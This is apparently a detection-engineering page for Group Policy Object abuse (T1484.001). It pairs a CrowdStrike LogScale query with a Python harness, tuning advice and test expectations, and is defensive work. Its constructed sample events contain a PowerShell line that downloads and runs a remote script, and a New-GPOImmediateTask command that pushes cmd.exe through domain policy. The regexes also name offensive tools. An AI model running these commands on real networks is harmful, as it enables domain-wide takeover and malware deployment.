Detect Group Policy Modification in CrowdStrike LogScale
Adversaries may modify Group Policy Objects (GPOs) to subvert intended access controls across a Windows domain, typically to escalate privileges, disable security tools, or distribute payloads at scale. A GPO has two halves: the Group Policy Container, an Active Directory object whose attributes (versionNumber, gPCMachineExtensionNames) record what the policy applies, and the Group Policy Template, the files under SYSVOL that hold the actual settings. Malicious GPO modifications can deploy scheduled tasks, create accounts, grant dangerous user rights such as SeEnableDelegationPrivilege, or push ransomware to every domain-joined machine simultaneously. LockBit 2.0/3.0 and Qilin ransomware modified GPOs to disable Windows Defender and propagate malware domain-wide. APT41 used GPO-deployed scheduled tasks for coordinated ransomware deployment. Indrik Spider (Evil Corp), Cinnamon Tempest, and Storm-0501 have all leveraged GPO modification for lateral movement and payload execution at scale. PowerView's New-GPOImmediateTask (also exposed as an Empire module) and SharpGPOAbuse give any principal that already holds write access to a GPO a ready-made way to abuse it.
MITRE ATT&CK
- Sub-technique
- T1484.001 Group Policy Modification
- Canonical reference
- https://attack.mitre.org/techniques/T1484/001/
LogScale Detection Query
// T1484.001 - Group Policy Modification
// LogScale has no union pipe: the three Falcon event streams are OR'd in the filter,
// then a case block assigns the per-branch fields.
(#event_simpleName=ProcessRollup2
   ImageFileName=/(?i)(powershell\.exe|pwsh\.exe)$/
   CommandLine=/(?i)(New-GPOImmediateTask|New-GPPImmediateTask|New-GPO\s|Set-GPOLink|Import-GPO|Set-GPPermissions|SharpGPOAbuse|Invoke-GPOZaurr|SeEnableDelegationPrivilege|GptTmpl\.inf|Get-GPPermissions|New-GPLink|Set-GPRegistryValue)/)
OR
(#event_simpleName=FileWritten
   TargetFileName=/(?i)\\sysvol\\/
   TargetFileName=/(?i)(ScheduledTasks\.xml|GptTmpl\.inf|GPT\.INI|Registry\.xml|Startup\.xml|Shutdown\.xml|Groups\.xml|Services\.xml|Files\.xml)$/)
OR
(#event_simpleName=ScriptControlScanTelemetry
   ScriptContent=/(?i)(New-GPOImmediateTask|SharpGPOAbuse|Invoke-GPOZaurr|Set-GPPermissions|SeEnableDelegationPrivilege|GptTmpl\.inf|New-GPO\s|Set-GPOLink|Import-GPO)/)
| case {
    // Branch 1: PowerShell executing GPO management cmdlets or known attack tools
    #event_simpleName=ProcessRollup2
      | IsAttackTool := if(CommandLine=/(?i)(SharpGPOAbuse|Invoke-GPOZaurr|New-GPOImmediateTask|SeEnableDelegationPrivilege)/, then="true", else="false")
      | IsHighRisk := IsAttackTool
      | DetectionSource := "PowerShell_GPOTools";
    // Branch 2: SYSVOL file write events - GPO policy content modification
    #event_simpleName=FileWritten
      | IsAttackTool := "false"
      | IsHighRisk := if(TargetFileName=/(?i)(ScheduledTasks\.xml|GptTmpl\.inf)$/, then="true", else="false")
      | DetectionSource := "SYSVOL_FileSystem";
    // Branch 3: PowerShell script block telemetry - catches obfuscated/encoded GPO operations
    #event_simpleName=ScriptControlScanTelemetry
      | IsAttackTool := if(ScriptContent=/(?i)(SharpGPOAbuse|Invoke-GPOZaurr|New-GPOImmediateTask|SeEnableDelegationPrivilege)/, then="true", else="false")
      | IsHighRisk := IsAttackTool
      | DetectionSource := "PSScriptBlock_GPOTools";
  }
| table([#event_simpleName, @timestamp, ComputerName, UserName, ImageFileName, CommandLine, TargetFileName, ScriptContent, IsAttackTool, IsHighRisk, DetectionSource])
| sort(field=@timestamp, order=desc)

CrowdStrike LogScale (Falcon CQL) detection for T1484.001 Group Policy Modification across three Falcon telemetry streams: (1) ProcessRollup2 events for PowerShell executing GPO management cmdlets (New-GPOImmediateTask, Import-GPO, Set-GPPermissions) and known attack tools (SharpGPOAbuse, Invoke-GPOZaurr); (2) FileWritten events targeting SYSVOL paths with critical GPO policy file names; and (3) ScriptControlScanTelemetry, Falcon's PowerShell script-content stream, which catches obfuscated or -EncodedCommand GPO abuse that evades the command-line matching in (1). The three streams are OR'd in the filter and a case block assigns IsAttackTool, IsHighRisk and DetectionSource per branch. IsAttackTool distinguishes known offensive tooling from legitimate administrative cmdlets; IsHighRisk is set for any attack-tool match and for the two SYSVOL files that execute code or change user rights (ScheduledTasks.xml, GptTmpl.inf). Two coverage caveats: the SYSVOL write is observed on the domain controller that hosts the share, so branch 2 requires the sensor on DCs; and branch 3 only produces events on hosts where Script-Based Execution Monitoring is enabled in the prevention policy.
Data Sources
Required Tables
- ProcessRollup2: process execution with ImageFileName and CommandLine (branch 1)
- FileWritten: file writes with TargetFileName; the SYSVOL write is recorded on the domain controller that hosts the share, so the sensor must be deployed on DCs (branch 2)
- ScriptControlScanTelemetry: PowerShell script content (ScriptContent) captured by Script-Based Execution Monitoring (branch 3)
False Positives & Tuning
- Authorized domain administrators running GPO management scripts with the RSAT GroupPolicy module: ProcessRollup2 and ScriptControlScanTelemetry events will fire on legitimate New-GPO, Set-GPOLink, and Set-GPRegistryValue invocations; correlate UserName against a domain admin allowlist and verify the activity matches a change ticket
- Invoke-GPOZaurr belongs to GPOZaurr, Evotec's GPO reporting and cleanup module, which administrators run for periodic GPO audits; it is flagged IsAttackTool here because attackers use it for the same reconnaissance, so expect it from admin workstations and treat it as high risk only from unexpected hosts or accounts
- SYSVOL DFS-R replication on domain controllers generates FileWritten events as GPO policy files propagate from the PDC emulator to the other DCs; on the receiving DCs the writer is the DFS Replication service (DFSRs.exe, running as SYSTEM). FileWritten does not carry the writer's image name, so join ContextProcessId to the ProcessRollup2 TargetProcessId and exclude writes by DFSRs.exe; do not exclude on UserName=SYSTEM alone, because writes arriving over SMB from a remote host are also performed by the DC's System process
- Automated compliance and hardening tooling (PowerShell DSC, Puppet, Chef, Ansible) running as service accounts that use Set-GPRegistryValue or Import-GPO for idempotent policy enforcement produces recurring ProcessRollup2 matches on a schedule; baseline these service account + cmdlet combinations and exclude them in the query (for example with a lookup file and match(), or an !in() filter on UserName) rather than at the alert layer, and never exclude the IsAttackTool patterns
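The three branches of the query and the tuning described above, as an added Python example (not part of this page's query and not CrowdStrike code) so the logic can be exercised offline against constructed Falcon-style events. The regexes are copied from the query; the allowlisted account CORP\svc-dsc is hypothetical, and so is the WriterImageFileName field, which stands in for the ProcessRollup2 ImageFileName you would obtain in LogScale by joining FileWritten.ContextProcessId to ProcessRollup2.TargetProcessId.

```python
import re

# Regexes copied from the three branches of the LogScale query above (re.I stands in for (?i)).
PS_IMAGE = re.compile(r"(powershell\.exe|pwsh\.exe)$", re.I)
GPO_CMDLETS = re.compile(r"(New-GPOImmediateTask|New-GPPImmediateTask|New-GPO\s|Set-GPOLink|Import-GPO|"
                         r"Set-GPPermissions|SharpGPOAbuse|Invoke-GPOZaurr|SeEnableDelegationPrivilege|"
                         r"GptTmpl\.inf|Get-GPPermissions|New-GPLink|Set-GPRegistryValue)", re.I)
ATTACK_TOOLS = re.compile(r"(SharpGPOAbuse|Invoke-GPOZaurr|New-GPOImmediateTask|SeEnableDelegationPrivilege)", re.I)
SYSVOL_PATH = re.compile(r"\\sysvol\\", re.I)
GPO_FILES = re.compile(r"(ScheduledTasks\.xml|GptTmpl\.inf|GPT\.INI|Registry\.xml|Startup\.xml|Shutdown\.xml|"
                       r"Groups\.xml|Services\.xml|Files\.xml)$", re.I)
HIGH_RISK_FILES = re.compile(r"(ScheduledTasks\.xml|GptTmpl\.inf)$", re.I)
SCRIPT_PATTERNS = re.compile(r"(New-GPOImmediateTask|SharpGPOAbuse|Invoke-GPOZaurr|Set-GPPermissions|"
                             r"SeEnableDelegationPrivilege|GptTmpl\.inf|New-GPO\s|Set-GPOLink|Import-GPO)", re.I)

def classify(ev):
    """Return the query's derived fields (IsAttackTool, IsHighRisk, DetectionSource) or None if no branch matches."""
    kind = ev.get("event_simpleName")
    if kind == "ProcessRollup2":                                   # branch 1
        if not (PS_IMAGE.search(ev.get("ImageFileName", "")) and GPO_CMDLETS.search(ev.get("CommandLine", ""))):
            return None
        tool = bool(ATTACK_TOOLS.search(ev["CommandLine"]))
        return {"IsAttackTool": tool, "IsHighRisk": tool, "DetectionSource": "PowerShell_GPOTools"}
    if kind == "FileWritten":                                      # branch 2
        path = ev.get("TargetFileName", "")
        if not (SYSVOL_PATH.search(path) and GPO_FILES.search(path)):
            return None
        return {"IsAttackTool": False, "IsHighRisk": bool(HIGH_RISK_FILES.search(path)),
                "DetectionSource": "SYSVOL_FileSystem"}
    if kind == "ScriptControlScanTelemetry":                       # branch 3
        content = ev.get("ScriptContent", "")
        if not SCRIPT_PATTERNS.search(content):
            return None
        tool = bool(ATTACK_TOOLS.search(content))
        return {"IsAttackTool": tool, "IsHighRisk": tool, "DetectionSource": "PSScriptBlock_GPOTools"}
    return None

# Tuning from the False Positives section. The service account name is a hypothetical placeholder.
ALLOWED_AUTOMATION = {("CORP\\svc-dsc", "Set-GPRegistryValue"), ("CORP\\svc-dsc", "Import-GPO")}
DFSR_IMAGE = re.compile(r"\\dfsrs\.exe$", re.I)   # DFS Replication service binary on domain controllers

def is_suppressed(ev, verdict):
    """Apply the allowlists. A known attack-tool match is never suppressed, whoever ran it."""
    if verdict["IsAttackTool"]:
        return False
    if verdict["DetectionSource"] == "PowerShell_GPOTools":
        cmdlet = GPO_CMDLETS.search(ev["CommandLine"]).group(1).strip()
        return (ev.get("UserName"), cmdlet) in ALLOWED_AUTOMATION
    if verdict["DetectionSource"] == "SYSVOL_FileSystem":
        # WriterImageFileName is hypothetical: in LogScale you would join FileWritten.ContextProcessId
        # to ProcessRollup2.TargetProcessId to learn which process performed the write.
        return bool(DFSR_IMAGE.search(ev.get("WriterImageFileName", "")))
    return False

def run(events):
    """Run the detection over events; return (alerts, suppressed) as lists of (event, verdict)."""
    alerts, suppressed = [], []
    for ev in events:
        verdict = classify(ev)
        if verdict is not None:
            (suppressed if is_suppressed(ev, verdict) else alerts).append((ev, verdict))
    return alerts, suppressed

PS = "\\Device\\HarddiskVolume2\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SYSVOL = "\\Device\\HarddiskVolume2\\Windows\\SYSVOL\\domain\\Policies\\{31B2F340-016D-11D2-945F-00C04FB984F9}\\MACHINE\\"
SAMPLE_EVENTS = [  # constructed Falcon-style events, not real captures
    {"event_simpleName": "ProcessRollup2", "ComputerName": "WS01", "UserName": "CORP\\jdoe", "ImageFileName": PS,
     "CommandLine": "powershell.exe -nop -c \"New-GPOImmediateTask -TaskName Update -GPODisplayName 'Default Domain Policy' -Command cmd.exe\""},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "MGMT01", "UserName": "CORP\\svc-dsc", "ImageFileName": PS,
     "CommandLine": "powershell.exe -File C:\\DSC\\enforce.ps1 Set-GPRegistryValue -Name Baseline"},
    {"event_simpleName": "FileWritten", "ComputerName": "DC02", "UserName": "SYSTEM",
     "TargetFileName": SYSVOL + "Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf",
     "WriterImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\DFSRs.exe"},      # inbound replication
    {"event_simpleName": "FileWritten", "ComputerName": "DC01", "UserName": "CORP\\jdoe",
     "TargetFileName": SYSVOL + "Preferences\\ScheduledTasks\\ScheduledTasks.xml",
     "WriterImageFileName": ""},                                                              # remote SMB write
    {"event_simpleName": "ScriptControlScanTelemetry", "ComputerName": "WS01", "UserName": "CORP\\jdoe",
     "ScriptContent": "IEX (New-Object Net.WebClient).DownloadString('http://10.0.0.5/p.ps1'); Invoke-GPOZaurr"},
    {"event_simpleName": "ProcessRollup2", "ComputerName": "WS02", "UserName": "CORP\\asmith",
     "ImageFileName": "\\Device\\HarddiskVolume2\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe GptTmpl.inf"},
]

if __name__ == "__main__":
    alerts, suppressed = run(SAMPLE_EVENTS)
    for ev, v in alerts:
        print("ALERT", v["DetectionSource"], ev["ComputerName"], ev["UserName"], "high-risk" if v["IsHighRisk"] else "")
    for ev, v in suppressed:
        print("SUPPRESSED", v["DetectionSource"], ev["ComputerName"], ev["UserName"])
```

Against the constructed events the run yields three alerts (the New-GPOImmediateTask command line, the ScheduledTasks.xml write on DC01, the downloaded script invoking Invoke-GPOZaurr) and two suppressions (the DSC service account's Set-GPRegistryValue run and the DFSRs.exe replication write on DC02); the notepad.exe event never enters branch 1 because the image is not PowerShell. Note that is_suppressed checks IsAttackTool first, so an allowlisted account running SharpGPOAbuse still alerts.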
Testing Methodology
Validate this detection against four adversary behaviours drawn from Atomic Red Team for T1484.001. Each test below lists the behaviour to exercise and the telemetry you should expect to see.
- Test 1: Create Malicious Scheduled Task via GPO (New-GPOImmediateTask)
Expected signal: Security Event ID 5137 on the domain controller: GPO container object created (ObjectClass=groupPolicyContainer). Security Event ID 5136 on the DC: gPCMachineExtensionNames added or updated to register the machine-side client-side extension (CSE) for the new policy. Sysmon Event ID 11: FileCreate for ScheduledTasks.xml under the GPO's MACHINE\Preferences\ScheduledTasks path in SYSVOL, from the PowerShell process. Security Event ID 5136: versionNumber attribute incremented on the GPO object. PowerShell script block log (Event ID 4104) capturing New-GPO, New-GPLink, and the file write.
- Test 2: Modify GptTmpl.inf to Grant SeEnableDelegationPrivilege
Expected signal: Sysmon Event ID 11: FileCreate for GptTmpl.inf in the SYSVOL path (\\DOMAIN\SYSVOL\DOMAIN\Policies\{GUID}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf). Security Event ID 5136 on the DC: gPCMachineExtensionNames updated to include the Security CSE GUID {827D319E-6EAC-11D2-A4EA-00C04F79F83A}. versionNumber increment. PowerShell script block log (Event ID 4104) capturing the SYSVOL path construction and the file write.
- Test 3: Enumerate GPO Permissions with PowerView (Recon Phase)
Expected signal: PowerShell script block log (Event ID 4104): Get-GPPermissions with the -All parameter iterating across every GPO. Sysmon Event ID 1: powershell.exe process creation with Get-GPPermissions and Get-GPO on the command line. The underlying LDAP searches against CN=Policies,CN=System are not audited by default; they surface only with Directory Service diagnostic logging on the DC (for example Event ID 1644 for expensive or inefficient searches) or network-level LDAP monitoring.
- Test 4: Deploy Ransomware Simulation via GPO Startup Script
Expected signal: Sysmon Event ID 11: FileCreate events for startup.bat and scripts.ini in the SYSVOL path from powershell.exe. Security Event ID 5136 on the DC: gPCMachineExtensionNames updated to include the Scripts CSE GUID {42B5FAAE-6536-11D2-AE5A-0000F87571E3}. versionNumber attribute incremented. PowerShell script block log (Event ID 4104) with the SYSVOL path construction and file write commands.
References
- https://attack.mitre.org/techniques/T1484/001/
- https://wald0.com/?p=179
- https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
- https://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/
- https://adsecurity.org/?p=2716
- https://github.com/FSecureLABS/SharpGPOAbuse
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136
- https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-directory-service-changes
- https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md